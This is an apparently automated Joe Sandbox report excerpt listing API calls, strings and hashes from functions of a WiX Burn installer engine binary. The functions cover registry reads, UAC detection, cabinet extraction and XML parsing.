                                                                                                                                                                  • Opcode Fuzzy Hash: e77e6ccc2199c052a908f3a4a553394b885e3bb4bb653e0696d70852991fb961
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A213B76B01219BBE7115B19CC44FFF36ADDBC6768F120026FE19AB340E6748D4196B0
APIs
• CompareStringW.KERNEL32(0000007F,00000000,00916CF2,000000FF,04685000,000000FF,00000000,PackageVersion,00916CF2,8D18C483,009331C1,00000001,00000000,00916CF2,009331C1,00916CF2), ref: 00927794
• RegCloseKey.ADVAPI32(00000000,00000000,PackageVersion,00916CF2,8D18C483,009331C1,00000001,00000000,00916CF2,009331C1,00916CF2,00000000,009331C1,009331C1,009331C1,00916CF2), ref: 009277B1
Strings
• Failed to remove update registration key: %ls, xrefs: 009277E6
• PackageVersion, xrefs: 00927775
• d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 0092774A, 009277F8
• Failed to format key for update registration., xrefs: 00927738
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseCompareString
• String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion$d:\a\wix4\wix4\src\burn\engine\registration.cpp
• API String ID: 446873843-2063007608
• Opcode ID: a18b5895fd461182749c6049d571e909b23cdc2a92df4c4d1ed632d0bb3af617
• Instruction ID: f7cabfeae5893e0d895bc01073d45f87ba5c46fc9a25e5dceb05a17a96476f8e
• Opcode Fuzzy Hash: a18b5895fd461182749c6049d571e909b23cdc2a92df4c4d1ed632d0bb3af617
• Instruction Fuzzy Hash: A731B531D44239BADB22AAE59C4AFAFFEBCDF44B51F100261B914B6195E6708A40D6E0
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: _memcpy_s
• String ID: Error reading version registry value due to unexpected data type: %u$Failed to convert registry string to version.$Failed to copy QWORD version value.$Failed to read version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 2001391462-2150151203
• Opcode ID: 8d81d2103b9de38beabd48dd6ca9b376cb65e71b308c490ba6bed40105758831
• Instruction ID: 98d2808f00c5a62b7d9b31922a39f371bfcc4eba4013a2f154ee4fefb97f0074
• Opcode Fuzzy Hash: 8d81d2103b9de38beabd48dd6ca9b376cb65e71b308c490ba6bed40105758831
• Instruction Fuzzy Hash: 87210671F81318B6DB216A548C4FFEF7AACDF86B18F004055FA247A2C1E5B08A00D6D2
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseErrorExecuteHandleLastShell
• String ID: <$ShellExecEx failed with return code: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
• API String ID: 3023784893-2678215300
• Opcode ID: de3b1e8b3c930b0779188288c2d0b340b18eadf0caa6834fd90a11a437a20fa1
• Instruction ID: 1ac4254130e8953299a798ec47c3cffbf9d8bce190fcf5512c3615cf5d34f1df
• Opcode Fuzzy Hash: de3b1e8b3c930b0779188288c2d0b340b18eadf0caa6834fd90a11a437a20fa1
• Instruction Fuzzy Hash: 57315AB6E01219ABDB10DF9ADC44A9EBBF8EF98710F10401BF919F7350E77099418BA0
APIs
• IsWindow.USER32(?), ref: 0095408F
  • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
  • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Heap$AllocateProcessWindow
• String ID: BA passed NULL hwndParent to Apply.$BA passed invalid hwndParent to Apply.$Failed to alloc BOOTSTRAPPER_ENGINE_ACTION$Failed to enqueue apply action.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
• API String ID: 850432942-3904185537
• Opcode ID: c0cfb8e6d8e26c6e4f0fcc70dcb4e0e65c7c32e0e803bee23ec74824ca6d4e2b
• Instruction ID: 79a1f0634f0d5c8d880546195738f10055e3ae728416addb6e9a1dc8c6c02487
• Opcode Fuzzy Hash: c0cfb8e6d8e26c6e4f0fcc70dcb4e0e65c7c32e0e803bee23ec74824ca6d4e2b
• Instruction Fuzzy Hash: 52210771B81314BBEB2196159C4BFAF255CCBA5B59F120114BA007F1C1E6E59EC057E2
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: _memcpy_s
• String ID: Failed to allocate memory for message.$Failed to calculate total pipe message size$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
• API String ID: 2001391462-2608942841
• Opcode ID: 56388e7705170f9085da55e084bb55097c21b1c9f1ad7e89b4bd07a0a0d69e9a
• Instruction ID: 358e8ce9ff95bc0b6f9e5ccf1bbe9df46f8ca1ab60c6aca3f667a1cb32dc28a5
• Opcode Fuzzy Hash: 56388e7705170f9085da55e084bb55097c21b1c9f1ad7e89b4bd07a0a0d69e9a
• Instruction Fuzzy Hash: D321C1B260021CBBDB11EA95CC86FEFB7ACEFD9724F050116F605A7241E7B49A4087A1
APIs
• InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,00000000,00000000), ref: 0092D523
• GetLastError.KERNEL32 ref: 0092D52D
• SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,00000000,00000000), ref: 0092D599
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AttributesErrorFileInitializeLast
• String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 669721577-2625618253
• Opcode ID: a6d95943983397b8bffda226c3593b8e90ecfc405e9db8d58ad586674435468e
• Instruction ID: d4d1d28e9abd57e9aa872d9376a6579f2750be27634c88f990e2910e9c4f2699
• Opcode Fuzzy Hash: a6d95943983397b8bffda226c3593b8e90ecfc405e9db8d58ad586674435468e
• Instruction Fuzzy Hash: 6D212F72F4172477E7216A999C86F9FB67C9F85B54F114055BA04B72C5E2F0DD008BA0
APIs
• GetLastError.KERNEL32 ref: 0097BB55
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 0097BB94
• GetLastError.KERNEL32 ref: 0097BB9E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLastTime$FileSystem
• String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp$failed to convert system time to file time$failed to get create time for internet file handle
• API String ID: 1528435940-425296829
• Opcode ID: 858452d0e90e818d70f6570a8a1eec25a18ee129d37887560ed20738a005f571
• Instruction ID: 681e1bd0caf4714f1f94d9383c5549ecd0d9363ba005c9ef78c43a0f91cd1e27
• Opcode Fuzzy Hash: 858452d0e90e818d70f6570a8a1eec25a18ee129d37887560ed20738a005f571
• Instruction Fuzzy Hash: 0F210A73E01229B7E3209AA48C49FBFB7ACAF49B50F014525BE08FB190E674DD0087E5
APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 1970631241-1065166858
                                                                                                                                                                  • Opcode ID: 86921d8d6db00ba4fe6442f7295763d56f59b1d9b5af89f3ff240b7f67587d5b
                                                                                                                                                                  • Instruction ID: 2dc683f0936a5377ae1b30222d773d0ecbcf1d25a4f2b31dba374542625cebbb
                                                                                                                                                                  • Opcode Fuzzy Hash: 86921d8d6db00ba4fe6442f7295763d56f59b1d9b5af89f3ff240b7f67587d5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 34212176640205BBDB01CF5DCC8AE9B3BACEF89B14F110054FA14EB2D6E6B0D900DB60
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0096B4C2,?), ref: 0096B5EF
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0096B539
                                                                                                                                                                  • Failed to read registry value to detect UAC., xrefs: 0096B5C7
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp, xrefs: 0096B582
                                                                                                                                                                  • EnableLUA, xrefs: 0096B599
                                                                                                                                                                  • Failed to open system policy key to detect UAC., xrefs: 0096B573
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: EnableLUA$Failed to open system policy key to detect UAC.$Failed to read registry value to detect UAC.$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-1917839530
                                                                                                                                                                  • Opcode ID: 4b23d2167dd1e92f8940f87906d1084d4f49aef79fba1aa517d4e8acf4b76f91
                                                                                                                                                                  • Instruction ID: f79e9e263f28b1fac7da72d41f6ae252c904e5762ac08480feea4e0d1cef7998
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b23d2167dd1e92f8940f87906d1084d4f49aef79fba1aa517d4e8acf4b76f91
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D212B72E80336FBD7215AA88C8BFEAA56C9F00760F150535BA42FB190F3B48DC092D0
                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0093D303,00000000,00000008,00000000,80070656), ref: 00912B56
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001,00000000,80070656,00000000,?), ref: 00912B63
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001), ref: 00912BE7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: Failed to allocate string for message.$Failed to format message for error: 0x%x$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                                  • API String ID: 1365068426-3351270200
                                                                                                                                                                  • Opcode ID: beb392225e06055525bb3447d52182667e08d68d06cdabf2a9c201531a023e85
                                                                                                                                                                  • Instruction ID: 814e7609cb2103b242b2aeef52ff84cf4dfc02e8e2fb7d37c5892d1ebe5eef11
                                                                                                                                                                  • Opcode Fuzzy Hash: beb392225e06055525bb3447d52182667e08d68d06cdabf2a9c201531a023e85
                                                                                                                                                                  • Instruction Fuzzy Hash: A421D8B7A4122DBBEB215F94CC4AFEF7A6CDB49754F004061FD04F6190E2748D5096E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00917D9B), ref: 00970C6C
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00970CB6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectNodes$pixnParent parameter was null in XmlSelectNodes$ppixnChild parameter was null in XmlSelectNodes
                                                                                                                                                                  • API String ID: 344208780-3683195698
                                                                                                                                                                  • Opcode ID: af3e689a9aad3cad361d8611a8e539d4b11b837be9a793114db4c6a82f8d2ead
                                                                                                                                                                  • Instruction ID: 9f343b358f3c652ec00ea801e00e3c97620e2028f6648b31ef1d39d7f291791f
                                                                                                                                                                  • Opcode Fuzzy Hash: af3e689a9aad3cad361d8611a8e539d4b11b837be9a793114db4c6a82f8d2ead
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D110663780315F7E7321A144C4AF6F219CDBDAB51F15C529FA08BB281DAE48D0187A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00917D9B), ref: 00970D43
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00970D8D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectSingleNode$pixnParent parameter was null in XmlSelectSingleNode$ppixnChild parameter was null in XmlSelectSingleNode
                                                                                                                                                                  • API String ID: 344208780-1462723567
                                                                                                                                                                  • Opcode ID: b9cc2cd94ea13f3237e139ce0df46381d30a01b00b9c28727daf8f1275230713
                                                                                                                                                                  • Instruction ID: 8b1b061b38124a12825081ba4e6eac4b858c30944cda5010b10781fa5599a998
                                                                                                                                                                  • Opcode Fuzzy Hash: b9cc2cd94ea13f3237e139ce0df46381d30a01b00b9c28727daf8f1275230713
                                                                                                                                                                  • Instruction Fuzzy Hash: ED11D333780715F7EB311A444C4AFBF619CDBDAB54F058179BA08BB2C1D6F49E0182A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0093E336
                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0093E348
                                                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 0093E35B
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0093DE6A,?,?), ref: 0093E36A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Time$File$CloseDateHandleLocal
• String ID: Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
• API String ID: 609741386-1831311109
• Opcode ID: 4997d4d2b8f84b84b064053be2c48d4890edf4813cb5f1eaf7ab368a8dbf4def
• Instruction ID: a3333b96123ec3dc82e3f8463d419441f9fac0c8a9d3416eea454266a5e38037
• Opcode Fuzzy Hash: 4997d4d2b8f84b84b064053be2c48d4890edf4813cb5f1eaf7ab368a8dbf4def
• Instruction Fuzzy Hash: 5321CFB290021ABBCB10DF698C49AEA7BACFF08720F404656F955E75D0D374EA50CB90
APIs
• FreeLibrary.KERNEL32(00000000,?,00962CD2,?,?,00000000,?,?,?,00962E2C,00000022,FlsSetValue,0099DA4C,0099DA54,?), ref: 00962C84
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 2440dd0c60dbd5d85d2a45251640c23e65e272f0bcdedf6bb2cd94887ca69443
• Instruction ID: 6d3cd859546e6ca1e0e9441d49b479b89ae7c105f23e7969faf3ba9bafe5373e
• Opcode Fuzzy Hash: 2440dd0c60dbd5d85d2a45251640c23e65e272f0bcdedf6bb2cd94887ca69443
• Instruction Fuzzy Hash: D1212932A05611ABCB219F24DC85A6F376CEF42775F2401A0FC56A72E1EB78ED01D6D1
APIs
• SysFreeString.OLEAUT32(00000000), ref: 0091D825
Strings
• Failed to copy condition string from BSTR, xrefs: 0091D7FE
• d:\a\wix4\wix4\src\burn\engine\condition.cpp, xrefs: 0091D810
• Failed to get Condition inner text., xrefs: 0091D7D8
• Condition, xrefs: 0091D790
• Failed to select condition node., xrefs: 0091D7B2
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeString
• String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$d:\a\wix4\wix4\src\burn\engine\condition.cpp
• API String ID: 3341692771-1135705897
• Opcode ID: 342e276bc19b8f6cc99ca536166064f8fe3ef6894902b06015b3e2dde76c022e
• Instruction ID: 547e4e9bee191f8e672b93079b02b9db5d404b2636ce0352ee271faddfc70613
• Opcode Fuzzy Hash: 342e276bc19b8f6cc99ca536166064f8fe3ef6894902b06015b3e2dde76c022e
• Instruction Fuzzy Hash: 6011E676B8121CBBDB22AB54CC0AFDF7A79DBC4F10F154055F905BB2D0DAB0AA809B50
APIs
• SysFreeString.OLEAUT32(00000000), ref: 00978C80
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeString
• String ID: Already process this datetime value.$Failed to convert value to time.$Failed to get value.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
• API String ID: 3341692771-436059191
• Opcode ID: 36f898fa48eaf9f15afe62d527cea35e7e315f5b4ec9ca8ad93cf1065f05cb4d
• Instruction ID: c55e16a620b1ec2701823b29a79a6c45df1319ef0300e7d023600a8bc46f0e7e
• Opcode Fuzzy Hash: 36f898fa48eaf9f15afe62d527cea35e7e315f5b4ec9ca8ad93cf1065f05cb4d
• Instruction Fuzzy Hash: 791104B2AC2215BAD7221A458C4EFABBA6CDB91765F188125F70CBB180DAB05D00D6E0
APIs
• PathAllocCanonicalize.KERNELBASE(?,?,00971D45), ref: 00971C32
• LocalFree.KERNEL32(00000000,00000000,?,?,00971D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00971C9F
Strings
• Failed to initialize path2utl., xrefs: 00971C79
• Failed to canonicalize: %ls, xrefs: 00971C3D
